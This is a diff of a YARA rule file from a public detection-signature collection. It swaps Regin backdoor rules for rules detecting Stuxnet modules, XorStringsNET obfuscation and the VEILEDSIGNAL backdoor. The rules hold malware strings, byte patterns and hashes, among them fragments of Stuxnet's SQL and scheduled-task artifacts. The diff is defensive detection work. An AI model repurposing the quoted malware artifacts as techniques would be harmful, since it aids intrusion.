-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_regin_fiveeyes.yar#L96-L122"
+		description = "Stuxnet Sample - file maindll.decrypted.unpacked.dll_"
+		author = "Florian Roth (Nextron Systems)"
+		id = "7009a41c-0588-5392-ae1c-045e0a5ee56b"
+		date = "2016-07-09"
+		modified = "2023-12-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_stuxnet.yar#L130-L150"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9454eb8b45a720fbe517caa2221fb0ceedf561902d94cabe513e921cc52fe035"
+		logic_hash = "bec740cdb4c1748d0fb546691cf8feb38c0e61adad60c069c5866f5034cb7ed9"
+		score = 75
+		quality = 85
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "4c3d7b38339d7b8adf73eaf85f0eb9fab4420585c6ab6950ebd360428af11712"
+
+	strings:
+		$s1 = "%SystemRoot%\\system32\\Drivers\\mrxsmb.sys;%SystemRoot%\\system32\\Drivers\\*.sys" fullword wide
+		$s2 = "<Actions Context=\"%s\"><Exec><Command>%s</Command><Arguments>%s,#%u</Arguments></Exec></Actions>" fullword wide
+		$s3 = "%SystemRoot%\\inf\\oem7A.PNF" fullword wide
+		$s4 = "%SystemRoot%\\inf\\mdmcpq3.PNF" fullword wide
+		$s5 = "%SystemRoot%\\inf\\oem6C.PNF" fullword wide
+		$s6 = "@abf varbinary(4096) EXEC @hr = sp_OACreate 'ADODB.Stream', @aods OUT IF @hr <> 0 GOTO endq EXEC @hr = sp_OASetProperty @" wide
+		$s7 = "STORAGE#Volume#1&19f7e59c&0&" fullword wide
+		$s8 = "view MCPVREADVARPERCON as select VARIABLEID,VARIABLETYPEID,FORMATFITTING,SCALEID,VARIABLENAME,ADDRESSPARAMETER,PROTOKOLL,MAXLIMI" ascii
+
+	condition:
+		6 of them
+}
+rule SIGNATURE_BASE_Stuxnet_S7Hkimdb : FILE
+{
+	meta:
+		description = "Stuxnet Sample - file s7hkimdb.dll"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e4cb277f-5eee-5405-9d48-d06657392323"
+		date = "2016-07-09"
+		modified = "2023-12-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_stuxnet.yar#L152-L188"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
+		logic_hash = "a44063b6a542eca17f46802e9f644540f1d6b6cb9777c20ef9ea14e44c341a1c"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "e0895336617e0b45b312383814ec6783556d7635"
-		hash2 = "732298fa025ed48179a3a2555b45be96f7079712"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "4071ec265a44d1f0d42ff92b2fa0b30aafa7f6bb2160ed1d0d5372d70ac654bd"
 
 	strings:
-		$m0 = { 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 }
-		$s0 = "KeGetCurrentIrql" fullword ascii
-		$s1 = "5.2.3790.0 (srv03_rtm.030324-2048)" fullword wide
-		$s2 = "usbclass" fullword wide
-		$x1 = "PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING" ascii
-		$x2 = "Universal Serial Bus Class Driver" fullword wide
-		$x3 = "5.2.3790.0" fullword wide
-		$y1 = "LSA Shell" fullword wide
-		$y2 = "0Richw" fullword ascii
+		$x1 = "S7HKIMDX.DLL" fullword wide
+		$op1 = { 8b 45 08 35 dd 79 19 ae 33 c9 8b 55 08 89 02 89 }
+		$op2 = { 74 36 8b 7f 08 83 ff 00 74 2e 0f b7 1f 8b 7f 04 }
+		$op3 = { 74 70 81 78 05 8d 54 24 04 75 1b 81 78 08 04 cd }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and $m0 at 0 and all of ( $s* ) and ( all of ( $x* ) or all of ( $y* ) ) and filesize < 20KB
+		( uint16( 0 ) == 0x5a4d and filesize < 40KB and $x1 and all of ( $op* ) )
 }
-rule SIGNATURE_BASE_Regin_Sig_Svcsstat : FILE
+rule SIGNATURE_BASE_MSIL_SUSP_OBFUSC_Xorstringsnet : FILE
 {
 	meta:
-		description = "Detects svcstat from Regin report - file svcsstat.exe_sample"
-		author = "@MalwrSignatures"
-		id = "0cb493d7-c7f1-54c4-9805-d9894bf399da"
-		date = "2014-11-26"
-		modified = "2024-04-24"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_regin_fiveeyes.yar#L126-L143"
+		description = "Detects XorStringsNET string encryption, and other obfuscators derived from it"
+		author = "dr4k0nia"
+		id = "f0724ca6-4bfe-5b88-9396-a58aa7461fd6"
+		date = "2023-03-26"
+		modified = "2023-12-05"
+		reference = "https://github.com/dr4k0nia/yara-rules"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_net_xorstrings.yar#L2-L27"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "5164edc1d54f10b7cb00a266a1b52c623ab005e2"
-		logic_hash = "2b1fdc2cc8c0aedaf749ee0e87a8853b91735a4e215c65df221a930d4b1d02f7"
+		logic_hash = "6d023a80bd8f5709721c3ace8a7230b847ca4bd2a1aff502a25333ffc8bf75ca"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		version = "1.0"
 
 	strings:
-		$s0 = "Service Control Manager" fullword ascii
-		$s1 = "_vsnwprintf" ascii
-		$s2 = "Root Agency" fullword ascii
-		$s3 = "Root Agency0" fullword ascii
-		$s4 = "StartServiceCtrlDispatcherA" fullword ascii
-		$s5 = "\\\\?\\UNC" fullword wide
-		$s6 = "%ls%ls" fullword wide
+		$pattern = { 06 1E 58 07 8E 69 FE 17 }
+		$a1 = "_CorDllMain" ascii
+		$a2 = "_CorExeMain" ascii
+		$a3 = "mscorlib" ascii fullword
+		$a4 = ".cctor" ascii fullword
+		$a5 = "System.Private.Corlib" ascii
+		$a6 = "<Module>" ascii fullword
+		$a7 = "<PrivateImplementationsDetails{" ascii
 
 	condition:
-		all of them and filesize < 15KB and filesize > 10KB
+		uint16( 0 ) == 0x5a4d and filesize < 25MB and $pattern and 2 of ( $a* )
 }
-rule SIGNATURE_BASE_Regin_Sample_1 : FILE
+rule SIGNATURE_BASE_APT_MAL_VEILEDSIGNAL_Backdoor_Apr23 : FILE
 {
 	meta:
-		description = "Semiautomatically generated YARA rule - file-3665415_sys"
-		author = "Florian Roth"
-		id = "13478652-155f-52ba-af16-53f27c92e052"
-		date = "2014-11-25"
-		modified = "2024-04-24"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_regin_fiveeyes.yar#L145-L174"
+		description = "Detects malicious VEILEDSIGNAL backdoor"
+		author = "X__Junior"
+		id = "74c403ea-3178-58e8-88b3-a51c1d475868"
+		date = "2023-04-20"
+		modified = "2023-12-05"
+		reference = "https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nk_tradingtech_apr23.yar#L2-L17"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "773d7fab06807b5b1bc2d74fa80343e83593caf2"
-		logic_hash = "e8291b4a68924dccdd825ee2cc8930acb794e92e0302598872ec78eb0bf8504f"
-		score = 70
+		logic_hash = "4fe1a1b09344cd84f981b193b480d23807893b59ad781868d82089a7306c042f"
+		score = 85
 		quality = 85
 		tags = "FILE"
+		hash1 = "aa318070ad1bf90ed459ac34dc5254acc178baff3202d2ea7f49aaf5a055dd43"
 
 	strings:
-		$s0 = "Getting PortName/Identifier failed - %x" fullword ascii
-		$s1 = "SerialAddDevice - error creating new devobj [%#08lx]" fullword ascii
-		$s2 = "External Naming Failed - Status %x" fullword ascii
-		$s3 = "------- Same multiport - different interrupts" fullword ascii
-		$s4 = "%x occurred prior to the wait - starting the" fullword ascii
-		$s5 = "'user registry info - userPortIndex: %d" fullword ascii
-		$s6 = "Could not report legacy device - %x" fullword ascii
-		$s7 = "entering SerialGetPortInfo" fullword ascii
-		$s8 = "'user registry info - userPort: %x" fullword ascii
-		$s9 = "IoOpenDeviceRegistryKey failed - %x " fullword ascii
-		$s10 = "Kernel debugger is using port at address %X" fullword ascii
-		$s12 = "Release - freeing multi context" fullword ascii
-		$s13 = "Serial driver will not load port" fullword ascii
-		$s14 = "'user registry info - userAddressSpace: %d" fullword ascii
-		$s15 = "SerialAddDevice: Enumeration request, returning NO_MORE_ENTRIES" fullword ascii
-		$s20 = "'user registry info - userIndexed: %d" fullword ascii
-		$fp1 = "Enter SerialBuildResourceList" ascii fullword
+		$op1 = {B8 AB AA AA AA F7 E1 8B C1 C1 EA 02 8D 14 52 03 D2 2B C2 8A 84 05 ?? ?? ?? ?? 30 84 0D ?? ?? ?? ??}
+		$op2 = { 50 66 0F 13 85 ?? ?? ?? ?? 66 0F 13 85 ?? ?? ?? ?? 66 0F 13 85 ?? ?? ?? ?? 66 0F 13 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 3C 00 00 00 C7 85 ?? ?? ?? ?? 40 00 00 00 C7 85 ?? ?? ?? ?? 05 00 00 00 FF 15}
+		$op3 = { 6A 00 8D 85 ?? ?? ?? ?? 50 6A 04 8D 85 ?? ?? ?? ?? 50 57 FF 15 }
 
 	condition:
-		all of them and filesize < 110KB and filesize > 80KB and not $fp1
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule SIGNATURE_BASE_Regin_Sample_2 : FILE
+rule SIGNATURE_BASE_SUSP_APT_MAL_VEILEDSIGNAL_Backdoor_Apr23
 {
 	meta:
-		description = "Auto-generated rule - file hiddenmod_hookdisk_and_kdbg_8949d000.bin"
-		author = "@MalwrSignatures"
-		id = "1091a598-e964-5f67-9267-531d66831bee"
-		date = "2014-11-26"
-		modified = "2024-04-24"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_regin_fiveeyes.yar#L176-L203"
+		description = "Detects marker found in VEILEDSIGNAL backdoor"
+		author = "X__Junior"
+		id = "8f0d92b6-d9b0-55e3-b2ca-601d095f5279"
+		date = "2023-04-20"
+		modified = "2023-04-21"
+		reference = "https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nk_tradingtech_apr23.yar#L19-L35"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "a7b285d4b896b66fce0ebfcd15db53b3a74a0400"
-		logic_hash = "a11d03d10661c1fc094450b250056196e5d8d16bd171eba9e37c7524aa2301d2"
+		logic_hash = "ccb482a7634dc24fde03b5730bf28a9e028f8d5a9ad46ba9663d1b520264d8f4"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
+		hash1 = "aa318070ad1bf90ed459ac34dc5254acc178baff3202d2ea7f49aaf5a055dd43"
 
 	strings:
-		$s0 = "\\SYSTEMROOT\\system32\\lsass.exe" wide
-		$s1 = "atapi.sys" fullword wide
-		$s2 = "disk.sys" fullword wide
-		$s3 = "IoGetRelatedDeviceObject" fullword ascii
-		$s4 = "HAL.dll" fullword ascii
-		$s5 = "\\Registry\\Machine\\System\\CurrentControlSet\\Services" ascii
-		$s6 = "PsGetCurrentProcessId" fullword ascii
-		$s7 = "KeGetCurrentIrql" fullword ascii
-		$s8 = "\\REGISTRY\\Machine\\System\\CurrentControlSet\\Control\\Session Manager" wide
-		$s9 = "KeSetImportanceDpc" fullword ascii
-		$s10 = "KeQueryPerformanceCounter" fullword ascii
-		$s14 = "KeInitializeEvent" fullword ascii
-		$s15 = "KeDelayExecutionThread" fullword ascii
-		$s16 = "KeInitializeTimerEx" fullword ascii
-		$s18 = "PsLookupProcessByProcessId" fullword ascii
-		$s19 = "ExReleaseFastMutexUnsafe" fullword ascii
-		$s20 = "ExAcquireFastMutexUnsafe" fullword ascii
+		$opb1 = { 81 BD ?? ?? ?? ?? 5E DA F3 76}
+		$opb2 = { C7 85 ?? ?? ?? ?? 74 F2 39 DA 66 C7 85 ?? ?? ?? ?? E5 CF}
+		$opb3 = { C7 85 ?? ?? ?? ?? 74 F2 39 DA B9 00 04 00 00 66 C7 85 ?? ?? ?? ?? E5 CF }
 
 	condition:
-		all of them and filesize < 40KB and filesize > 30KB
+		2 of them
 }
-rule SIGNATURE_BASE_Regin_Sample_3 : FILE
+rule SIGNATURE_BASE_APT_NK_MAL_M_Hunting_VEILEDSIGNAL_1 : FILE
 {
 	meta:
-		description = "Detects Regin Backdoor sample fe1419e9dde6d479bd7cda27edd39fafdab2668d498931931a2769b370727129"
-		author = "@Malwrsignatures"
-		id = "eefc174f-4b17-5c90-8478-3eaaf80e9a78"
-		date = "2014-11-27"
-		modified = "2024-04-24"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_regin_fiveeyes.yar#L205-L230"
+		description = "Detects VEILEDSIGNAL malware"
+		author = "Mandiant"
+		id = "3e7c92fe-a7bd-5180-9935-4f98f2b64e2b"
+		date = "2023-04-20"
+		modified = "2023-12-05"
+		reference = "https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nk_tradingtech_apr23.yar#L37-L55"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "fe1419e9dde6d479bd7cda27edd39fafdab2668d498931931a2769b370727129"
-		logic_hash = "5a0f77f203765f7737c00c3df760ea7f3ed354559aad07f3053173ff09e1ce1a"
+		logic_hash = "439a201e6a44a00a31fd13efc83a1acf858a52201e3ab48d5cf095bae1e48cf7"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		disclaimer = "This rule is meant for hunting and is not tested to run in a production environment"
+		hash1 = "404b09def6054a281b41d309d809a428"
+		hash2 = "c6441c961dcad0fe127514a918eaabd4"
 
 	strings:
-		$s0 = "Service Pack x" fullword wide
-		$s1 = "\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion" wide
-		$s2 = "\\REGISTRY\\Machine\\Software\\Microsoft\\Windows NT\\CurrentVersion\\HotFix" wide
-		$s3 = "mntoskrnl.exe" fullword wide
-		$s4 = "\\REGISTRY\\Machine\\System\\CurrentControlSet\\Control\\Session Manager\\Memory Management" wide
-		$s5 = "Memory location: 0x%p, size 0x%08x" wide fullword
-		$s6 = "Service Pack" fullword wide
-		$s7 = ".sys" fullword wide
-		$s8 = ".dll" fullword wide
-		$s10 = "\\REGISTRY\\Machine\\Software\\Microsoft\\Updates" wide
-		$s11 = "IoGetRelatedDeviceObject" fullword ascii
-		$s12 = "VMEM.sys" fullword ascii
-		$s13 = "RtlGetVersion" fullword wide
-		$s14 = "ntkrnlpa.exe" fullword ascii
+		$rh1 = { 68 5D 7A D2 2C 3C 14 81 2C 3C 14 81 2C 3C 14 81 77 54 10 80 26 3C 14 81 77 54 17 80 29 3C 14 81 77 54 11 80 AB 3C 14 81 D4 4C 11 80 33 3C 14 81 D4 4C 10 80 22 3C 14 81 D4 4C 17 80 25 3C 14 81 77 54 15 80 27 3C 14 81 2C 3C 15 81 4B 3C 14 81 94 4D 1D 80 28 3C 14 81 94 4D 14 80 2D 3C 14 81 94 4D 16 80 2D 3C 14 81 }
+		$rh2 = { 00 E5 A0 2B 44 84 CE 78 44 84 CE 78 44 84 CE 78 1F EC CA 79 49 84 CE 78 1F EC CD 79 41 84 CE 78 1F EC CB 79 C8 84 CE 78 BC F4 CA 79 4A 84 CE 78 BC F4 CD 79 4D 84 CE 78 BC F4 CB 79 65 84 CE 78 1F EC CF 79 43 84 CE 78 44 84 CF 78 22 84 CE 78 FC F5 C7 79 42 84 CE 78 FC F5 CE 79 45 84 CE 78 FC F5 CC 79 45 84 CE 78}
+		$rh3 = { DA D2 21 22 9E B3 4F 71 9E B3 4F 71 9E B3 4F 71 C5 DB 4C 70 94 B3 4F 71 C5 DB 4A 70 15 B3 4F 71 C5 DB 4B 70 8C B3 4F 71 66 C3 4B 70 8C B3 4F 71 66 C3 4C 70 8F B3 4F 71 C5 DB 49 70 9F B3 4F 71 66 C3 4A 70 B0 B3 4F 71 C5 DB 4E 70 97 B3 4F 71 9E B3 4E 71 F9 B3 4F 71 26 C2 46 70 9F B3 4F 71 26 C2 B0 71 9F B3 4F 71 9E B3 D8 71 9F B3 4F 71 26 C2 4D 70 9F B3 4F 71 }
+		$rh4 = { CB 8A 35 66 8F EB 5B 35 8F EB 5B 35 8F EB 5B 35 D4 83 5F 34 85 EB 5B 35 D4 83 58 34 8A EB 5B 35 D4 83 5E 34 09 EB 5B 35 77 9B 5E 34 92 EB 5B 35 77 9B 5F 34 81 EB 5B 35 77 9B 58 34 86 EB 5B 35 D4 83 5A 34 8C EB 5B 35 8F EB 5A 35 D3 EB 5B 35 37 9A 52 34 8C EB 5B 35 37 9A 58 34 8E EB 5B 35 37 9A 5B 34 8E EB 5B 35 37 9A 59 34 8E EB 5B 35 }
 
 	condition:
-		uint32( 0 ) == 0xfedcbafe and all of ( $s* ) and filesize > 160KB and filesize < 200KB
+		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and 1 of ( $rh* )
 }
-rule SIGNATURE_BASE_Regin_Sample_Set_2 : FILE
+rule SIGNATURE_BASE_APT_NK_MAL_M_Hunting_VEILEDSIGNAL_2 : FILE
 {
 	meta:
-		description = "Auto-generated rule - file SHF-000052 and ndisips.sys"
-		author = "@MalwrSignatures"
-		id = "0b21091d-413e-54dd-83d1-5d824fb013f2"
-		date = "2014-11-26"
-		modified = "2024-04-24"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_regin_fiveeyes.yar#L232-L264"
+		description = "Detects VEILEDSIGNAL malware"
+		author = "Mandiant"
+		id = "1b96c2f0-1c57-593e-9630-a72d43eb857e"
+		date = "2023-04-20"
+		modified = "2023-12-05"
+		reference = "https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nk_tradingtech_apr23.yar#L57-L76"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "26125cea704532cbc22df46af228299ae810bce60938bee7b067ed273158d76f"
+		logic_hash = "62f74faa8f136f4dc63a4b703cffcb97b438cc4f180d5d127d1fc4b86d3cd1d1"
 		score = 75
-		quality = 83
+		quality = 85
 		tags = "FILE"
-		hash1 = "8487a961c8244004c9276979bb4b0c14392fc3b8"
-		hash2 = "bcf3461d67b39a427c83f9e39b9833cfec977c61"
+		disclaimer = "This rule is meant for hunting and is not tested to run in a production environment"
+		hash1 = "404b09def6054a281b41d309d809a428"
 
 	strings:
-		$s0 = "HAL.dll" fullword ascii
-		$s1 = "IoGetDeviceObjectPointer" fullword ascii
-		$s2 = "MaximumPortsServiced" fullword wide
-		$s3 = "KeGetCurrentIrql" fullword ascii
-		$s4 = "ntkrnlpa.exe" fullword ascii
-		$s5 = "\\REGISTRY\\Machine\\System\\CurrentControlSet\\Control\\Session Manager" wide
-		$s6 = "ConnectMultiplePorts" fullword wide
-		$s7 = "\\SYSTEMROOT" wide
-		$s8 = "IoWriteErrorLogEntry" fullword ascii
-		$s9 = "KeQueryPerformanceCounter" fullword ascii
-		$s10 = "KeServiceDescriptorTable" fullword ascii
-		$s11 = "KeRemoveEntryDeviceQueue" fullword ascii
-		$s12 = "SeSinglePrivilegeCheck" fullword ascii
-		$s13 = "KeInitializeEvent" fullword ascii
-		$s14 = "IoBuildDeviceIoControlRequest" fullword ascii
-		$s15 = "KeRemoveDeviceQueue" fullword ascii
-		$s16 = "IofCompleteRequest" fullword ascii
-		$s17 = "KeInitializeSpinLock" fullword ascii
-		$s18 = "MmIsNonPagedSystemAddressValid" fullword ascii
-		$s19 = "IoCreateDevice" fullword ascii
-		$s20 = "KefReleaseSpinLockFromDpcLevel" fullword ascii
+		$sb1 = { C1 E0 05 4D 8? [2] 33 D0 45 69 C0 7D 50 BF 12 8B C2 41 FF C2 C1 E8 07 33 D0 8B C2 C1 E0 16 41 81 C0 87 D6 12 00 }
+		$si1 = "CryptBinaryToStringA" fullword
+		$si2 = "BCryptGenerateSymmetricKey" fullword
+		$si3 = "CreateThread" fullword
+		$ss1 = "ChainingModeGCM" wide
+		$ss2 = "__tutma" fullword
 
 	condition:
-		filesize < 40KB and filesize > 30KB and all of them
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) and all of them
 }
-rule SIGNATURE_BASE_Regin_Sample_Set_1 : FILE
+rule SIGNATURE_BASE_APT_NK_MAL_M_Hunting_VEILEDSIGNAL_3 : FILE
 {
 	meta:
-		description = "Detects Regin Backdoor sample"
-		author = "@MalwrSignatures"
-		id = "b0f24a0b-10e7-5549-a300-516df8644cb0"
-		date = "2014-11-27"
-		modified = "2023-01-06"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_regin_fiveeyes.yar#L266-L296"
+		description = "Detects VEILEDSIGNAL malware"
+		author = "Mandiant"
+		id = "82790c65-1d93-509b-95df-841543943c30"
+		date = "2023-04-20"
+		modified = "2023-12-05"
+		reference = "https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nk_tradingtech_apr23.yar#L78-L96"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7402f409e7dd3180d8e6fe017af19d0a1d0dd86f85279191db1bc8f6c94951ac"
+		hash = "c6441c961dcad0fe127514a918eaabd4"
+		logic_hash = "2109340edfb1891baef5bd92ba3c9da77f891341de9e8094060a649de62fade2"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "4139149552b0322f2c5c993abccc0f0d1b38db4476189a9f9901ac0d57a656be"
-		hash2 = "e420d0cf7a7983f78f5a15e6cb460e93c7603683ae6c41b27bf7f2fa34b2d935"
+		disclaimer = "This rule is meant for hunting and is not tested to run in a production environment"
 
 	strings:
-		$hd = { fe ba dc fe }
-		$s0 = "d%ls%ls" fullword wide
-		$s1 = "\\\\?\\UNC" fullword wide
-		$s2 = "Software\\Microsoft\\Windows\\CurrentVersion" fullword wide
-		$s4 = "SYSTEM\\CurrentControlSet\\Control\\Class\\{4D36E972-E325-11CE-BFC1-08002BE10318}" fullword wide
-		$s5 = "System\\CurrentControlSet\\Services\\Tcpip\\Linkage" wide fullword
-		$s6 = "\\\\.\\Global\\%s" fullword wide
-		$s7 = "temp" fullword wide
-		$s8 = "\\\\.\\%s" fullword wide
-		$s9 = "Memory location: 0x%p, size 0x%08x" fullword wide
-		$s10 = "sscanf" fullword ascii
-		$s11 = "disp.dll" fullword ascii
-		$s12 = "%x:%x:%x:%x:%x:%x:%x:%x%c" fullword ascii
-		$s13 = "%d.%d.%d.%d%c" fullword ascii
-		$s14 = "imagehlp.dll" fullword ascii
-		$s15 = "%hd %d" fullword ascii
+		$ss1 = { 61 70 70 6C 69 63 61 74 69 6F 6E 2F 6A 73 6F 6E 2C 20 74 65 78 74 2F 6A 61 76 61 73 63 72 69 70 74 2C 20 2A 2F 2A 3B 20 71 3D 30 2E 30 31 00 00 61 63 63 65 70 74 00 00 65 6E 2D 55 53 2C 65 6E 3B 71 3D 30 2E 39 00 00 61 63 63 65 70 74 2D 6C 61 6E 67 75 61 67 65 00 63 6F 6F 6B 69 65 00 00 }
+		$si1 = "HttpSendRequestW" fullword
+		$si2 = "CreateNamedPipeW" fullword
+		$si3 = "CreateThread" fullword
+		$se1 = "DllGetClassObject" fullword
 
 	condition:
-		($hd at 0 ) and all of ( $s* ) and filesize < 450KB and filesize > 360KB
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) and all of them
 }
-rule SIGNATURE_BASE_Apt_Regin_Legspin : FILE
+rule SIGNATURE_BASE_APT_NK_MAL_M_Hunting_VEILEDSIGNAL_4 : FILE
 {
 	meta:
-		description = "Rule to detect Regin's Legspin module"
-		author = "Kaspersky Lab"
-		id = "2abd3605-d9bf-53f0-8521-ac8dc18d9fce"
-		date = "2015-01-22"
-		date = "2023-01-27"
-		modified = "2024-04-24"
-		reference = "https://securelist.com/blog/research/68438/an-analysis-of-regins-hopscotch-and-legspin/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_regin_fiveeyes.yar#L298-L319"
+		description = "Detects VEILEDSIGNAL malware"
+		author = "Mandiant"
+		id = "379e6471-3c4f-5c72-b8fd-17f481e89ac6"
+		date = "2023-04-20"
+		modified = "2023-12-05"
+		reference = "https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nk_tradingtech_apr23.yar#L98-L118"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "29105f46e4d33f66fee346cfd099d1cc"
-		logic_hash = "1b026f475fdbb3c97f33895520844fa4944eb2fffc0883502a6cb79162bbd388"
+		logic_hash = "2a875c39a43ff054ed5a6cf2fa1f17c2adc189452582763db8ceddfa652abfbf"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		version = "1.0"
+		disclaimer = "This rule is meant for hunting and is not tested to run in a production environment"
+		hash1 = "404b09def6054a281b41d309d809a428"
+		hash2 = "c6441c961dcad0fe127514a918eaabd4"
 
 	strings:
-		$a1 = "sharepw"
-		$a2 = "reglist"
-		$a3 = "logdump"
-		$a4 = "Name:" wide
-		$a5 = "Phys Avail:"
-		$a6 = "cmd.exe" wide
-		$a7 = "ping.exe" wide
-		$a8 = "millisecs"
+		$sb1 = { FF 15 FC 76 01 00 8B F0 85 C0 74 ?? 8D 50 01 [6-16] FF 15 [4] 48 8B D8 48 85 C0 74 ?? 89 ?? 24 28 44 8B CD 4C 8B C? 48 89 44 24 20 }
+		$sb2 = { 33 D2 33 C9 FF 15 [4] 4C 8B CB 4C 89 74 24 28 4C 8D 05 [2] FF FF 44 89 74 24 20 33 D2 33 C9 FF 15 }
+		$si1 = "CreateThread" fullword
+		$si2 = "MultiByteToWideChar" fullword
+		$si3 = "LocalAlloc" fullword
+		$se1 = "DllGetClassObject" fullword
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of ( $a* )
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) and all of them
 }
-rule SIGNATURE_BASE_Apt_Regin_Hopscotch : FILE
+rule SIGNATURE_BASE_APT_NK_MAL_M_Hunting_VEILEDSIGNAL_5 : FILE
 {
 	meta:
-		description = "Rule to detect Regin's Hopscotch module"
-		author = "Kaspersky Lab"
-		id = "907042ba-8e64-5ca7-9a83-70c28af1ab99"
-		date = "2015-01-22"
-		date = "2023-01-27"
-		modified = "2024-04-24"
-		reference = "https://securelist.com/blog/research/68438/an-analysis-of-regins-hopscotch-and-legspin/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_regin_fiveeyes.yar#L321-L342"
+		description = "Detects VEILEDSIGNAL malware"
+		author = "Mandiant"
+		id = "7d0718fc-4f1c-5293-8dc4-81a5783fbfb2"
+		date = "2023-04-20"
+		modified = "2023-12-05"
+		reference = "https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nk_tradingtech_apr23.yar#L120-L143"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "6c34031d7a5fc2b091b623981a8ae61c"
-		logic_hash = "33b5fa61aaa802a60f3d42d59eb474222841a8a557b06b23a9e325e922e2cec1"
+		logic_hash = "5d43b8198ad224bee8d290dd7031d73f76a7d957a2e3b44d89e7aaf5f2c94c65"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		version = "1.0"
